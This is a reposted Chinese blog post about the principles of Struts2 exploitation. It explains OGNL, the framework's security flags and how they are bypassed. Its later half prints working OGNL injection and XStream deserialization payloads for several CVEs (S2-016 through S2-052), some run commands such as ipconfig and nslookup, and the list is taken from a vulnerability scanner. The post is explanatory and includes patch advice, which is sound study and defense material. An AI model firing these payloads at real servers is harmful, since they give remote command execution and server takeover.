1. 首页
  2. 文章中心
  3. java

Struts2漏洞利用原理

110 阅读 0 评论
我是靠谱客的博主 合适世界,最近开发中收集的这篇文章主要介绍Struts2漏洞利用原理,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

概述:

Struts2是apache项目下的一个web 框架,目前web框架中非常流行的都是mvc设计模式、经典例子例如:python的Django、Flask;java的ssm等。因为使用MVC设计模式,所以在框架内部处理用户数据流参数的事后就不可避免的存在数据在不同层次流转的问题。struts2作为java的一款成熟的web框架,自然也面临这个问题,于是struts2设计了一套OGNL的模式来操作。

漏洞概述:

  Struts2漏洞由网安全宝在昨日率先拦截到其攻击,漏洞涉及Struts2.0及以上的版本,是一个远程命令执行漏洞和开放重定向漏洞。利用漏洞,黑客可发起远程攻击,不但可以窃取网站数据信息,甚至还可取得网站服务器控制权。而且,目前针对此漏洞的自动化工具开始出现,攻击者无需具备与漏洞相关的专业知识即可侵入服务器,直接执行命令操作,盗取数据甚至进行毁灭性操作。

为了防范攻击者可能利用此漏洞发起的攻击,应该尽快采取如下措施:

  1、DNSPOD的用户直在DNSPOD域名管理列表中开启安全中心,即可一键防御攻击。
  2 、从Struts2的官方网站下载最新的补丁程序,并尽快将Struts 2升级到最新的2.3.15.1版本,避免遭遇严重的安全攻击(下载地址http://struts.apache.org/download.cgi#struts23151)。鉴于Struts 2至今为止已经多次曝出严重的高危漏洞,如果不是必要,建议开发者以后考虑采用其它类似的Java开发框架。

Struts2原理:

 

 

二、OGNL(表达式引擎,处理view层数据都字符串到controller层转换成java对象的问题)的简单介绍:

可以参考博客

对于用户输入的参数存取处理api都在ognl.java中,分别由getvalue和setvalue两个函数实现

复制代码 
1 public static Object getValue(String expression,Map context,Object root) throws OgnlException{
2
return getValue((String)expression,(Map)context,root,(Class)null);
3 }
4 public static void setValue(String expression,Map context,Object root,Object value) throws OgnlException{
5
return setValue((Object)parseExpression(expression),(Map)content,root,value);
6 }
复制代码

三要素:

1、expression是带有语法语义的字符串,他定义了ognl要怎么处理一个对象。

2、root 被操作对象,就是ognl利用expression定义好的操作对root进行处理。访问root属性事后使用.调用:例如department.leader.name。getvalue和setvalue的对象(本质是一个java对象)。

3、content上下文环境对象,root所处的上下文环境。在这里定义为OgnlContext对象,root是其中一个特殊变量。访问使用#开始.区分,例如#root.department.leader.name(本质是一个Map结构)。

特殊的,ognl对静态属性和方法的访问,使用@classname@functiononame/varitename,举例:@core.example.core.Recourse@img/@core.example.core.Recourse@get()

三、OGNL支持构造对象(直接表达式创建):

1、构造list {} 中间用,分开元素的方式表达式列表

2、map 使用#{}构造,都好隔开key:value

3、java class的构造函数创建

四、在OGNL实现过程中的安全保护机制:

上文提到过,content在OGNL.java中定义在了计算时才动态创建的OgnlContext对象里面,并传入Map类型的content对root和一些默认行为。在一连串的过程中,struts默认配置一些安全保障机制,可惜是可以被绕过的。

1 //SecurityMemberAccess类中两个参数限制
2 denyMethodExecution = true;//禁止执行静态方法
3 MemberAccess = false;//禁止静态方法访问

五、漏洞利用:

1、对#的过滤可以使用u0023 Unicode编码代替(早期的修补方案没有考虑到编码的问题,只是简单做了过滤)

#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('u0023context['xwork.MethodAccessor.denyMethodExecution']u003du0023foo')(u0023foou003dnew%20java.lang.Boolean("false")))
上面绕过了两个安全机制参数的限制(修改了安全机制参数的值)

u0023_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('u0023context['xwork.MethodAccessor.denyMethodExecution']u003du0023foo')(u0023foou003dnew%20java.lang.Boolean("false")))&(asdf)
后面接的就是代码执行构造的命令执行:
&(asdf)(('u0023rt.exec(‘ipconfig’)')(u0023rt[email]u003d@java.lang.Runt[/email]ime@getRuntime()))=1
复制代码 
1 /*
2 http://mydomain/MyStruts.action?('u0023_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('u0023context['xwork.MethodAccessor.denyMethodExecution']u003du0023foo')(u0023foou003dnew%20java.lang.Boolean("false")))&(asdf)(('u0023rt.exec(‘ipconfig’)')(u0023rt[email]u003d@java.lang.Runt[/email]ime@getRuntime()))=1
3 */
复制代码

六、参看巡风的多个PoCs的Payload:

因为对于Java的复杂代码暂时没有分析能力,所以呢,有些poc里面的东西不能完整的理解其实现的每一步,先Mark下,后面再具体来看吧。

复制代码 
 1 /*
2 "S2_016": {"poc": [
3
"redirect:${%23out%3D%23u0063u006fu006eu0074u0065u0078u0074.u0067u0065u0074(new u006au0061u0076u0061u002eu006cu0061u006eu0067u002eu0053u0074u0072u0069u006eu0067(u006eu0065u0077u0020u0062u0079u0074u0065[]{99,111,109,46,111,112,101,110,115,121,109,112,104,111,110,121,46,120,119,111,114,107,50,46,100,105,115,112,97,116,99,104,101,114,46,72,116,116,112,83,101,114,118,108,101,116,82,101,115,112,111,110,115,101})).u0067u0065u0074u0057u0072u0069u0074u0065u0072(),%23u006fu0075u0074u002eu0070u0072u0069u006eu0074u006cu006e(u006eu0065u0077u0020u006au0061u0076u0061u002eu006cu0061u006eu0067u002eu0053u0074u0072u0069u006eu0067(u006eu0065u0077u0020u0062u0079u0074u0065[]{46,46,81,116,101,115,116,81,46,46})),%23u0072u0065u0064u0069u0072u0065u0063u0074,%23u006fu0075u0074u002eu0063u006cu006fu0073u0065()}"],
4
"key": "QtestQ"},
5
"S2_020": {
6
"poc": ["class[%27classLoader%27][%27jarPath%27]=1024", "class[%27classLoader%27][%27resources%27]=1024"],
7
"key": "No result defined for action"},
8
"S2_DEBUG": {"poc": [
9
"debug=command&expression=%23f%3d%23_memberAccess.getClass().getDeclaredField(%27allowStaticM%27%2b%27ethodAccess%27),%23f.setAccessible(true),%23f.set(%23_memberAccess,true),%23o%3d@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23o.println(%27[%27%2b%27ok%27%2b%27]%27),%23o.close()"],
10
"key": "[ok]"},
11
"S2_017_URL": {"poc": ["redirect:http://360.cn/", "redirectAction:http://360.cn/%23"],
12
"key": "http://www.360.cn/favicon.ico"},
13
"S2_032": {"poc": [
14
"method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(66666666-2),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse"],
15
"key": "66666664"},
16
"S2_045": {"poc": [
17
"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('['+'xunfeng'+']')).(#o.close())}"],
18
"key": "[xunfeng]"}
19
20 """s2-052的,这是一个XML反序列化的与之前的不同
21 当启用 Struts REST的XStream handler去反序列化处理XML请求,可能造成远程代码执行漏洞,进而直接导致服务器被入侵控制。
22 post_data = """<map>
23 <entry>
24 <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command><string>nslookup</string><string>%s</string><string>%s</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
25 </entry>
26 </map>""" %
27 """
28 */
复制代码

转载于:https://www.cnblogs.com/qiantan/p/10695901.html

最后

以上就是合适世界为你收集整理的Struts2漏洞利用原理的全部内容,希望文章能够帮你解决Struts2漏洞利用原理所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(73)

相关文章

ArrayList循环删除元素的方法总结一、遍历List集合的三种方式二、循环删除元素问题及比较分析三、源码分析四、总结for循环删除与迭代器删除的区别:五、 ArrayList的迭代器的实现
ArrayList循环删除元素的方法总结一、遍历List集合的三种方式二、循环删除元素问题及比较分析三、源码分析四、总结for循环删除与迭代器删除的区别:五、 ArrayList的迭代器的实现
Struts2-01-数据访问
Struts2-01-数据访问
struts2从form取值的三种方式 (转载)
struts2从form取值的三种方式 (转载)
使用struts2的标签,将setAttribute里面的内容直接在页面提取
使用struts2的标签,将setAttribute里面的内容直接在页面提取
Struts2漏洞利用原理
Struts2漏洞利用原理
Struts2 使用set和Map接收前台传来的数据
Struts2 使用set和Map接收前台传来的数据
总是提示找不到set或者get方法的错
总是提示找不到set或者get方法的错
Struts2中的3种传值方式
Struts2中的3种传值方式

评论列表共有 0 条评论

立即
投稿
返回
顶部